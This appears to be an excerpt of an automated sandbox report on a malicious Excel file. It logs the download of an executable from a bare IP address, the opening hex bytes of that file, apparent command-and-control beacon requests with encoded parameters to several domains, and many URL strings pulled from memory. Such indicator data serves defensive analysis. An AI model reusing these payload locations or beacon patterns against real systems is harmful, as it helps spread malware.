HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 May 2021 06:29:20 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 13 May 2021 06:24:23 GMTETag: "1bf800-5c2302daaa325"Accept-Ranges: bytesContent-Length: 1832960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d c5 9c 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e6 1b 00 00 10 00 00 00 00 00 00 92 05 1c 00 00 20 00 00 00 20 1c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 1c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 05 1c 00 4f 00 00 00 00 20 1c 00 d0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 1c 00 0c 00 00 00 08 04 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 e5 1b 00 00 20 00 00 00 e6 1b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0c 00 00 00 20 1c 00 00 0e 00 00 00 e8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 1c 00 00 02 00 00 00 f6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 05 1c 00 00 00 00 00 48 00 00 00 02 00 05 00 54 6d 04 00 34 8e 03 00 03 00 00 00 01 00 00 06 88 fb 07 00 80 08 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2c 00 00 0a 28 2d 00 00 0a 00 de 02 00 dc 00 28 08 00 00 06 02 6f 2e 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2f 00 00 0a 00 02 16 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 17 28 32 00 00 0a 00 02 16 28 33 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 21 07 00 06 28 34 00 00 0a 00 2a 4e 00 02 28 0a 00 00 06 6f 1a 07 00 06 28 35 00 00 0a 00 2a 26 00 02 28 36 00 00 0a 00 2a ce 73 37 00 00 0a 80 01 00 00 04 73 38 00 00 0a 80 02 00 00 04 73 39 00 00 0a 80 03 00 00 04 73 3a 00 00 0a 80 04 00 00 04 73 3b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01

Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 104.21.65.7 104.21.65.7
Source: Joe Sandbox View	IP Address: 54.85.86.211 54.85.86.211

Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic

HTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50
Source: unknown	TCP traffic detected without corresponding DNS query: 3.36.53.50

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75056775.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: www.hfjxhs.com

Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp	String found in binary or memory: http://instagram.com/casarpontocom
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2152979155.0000000002331000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
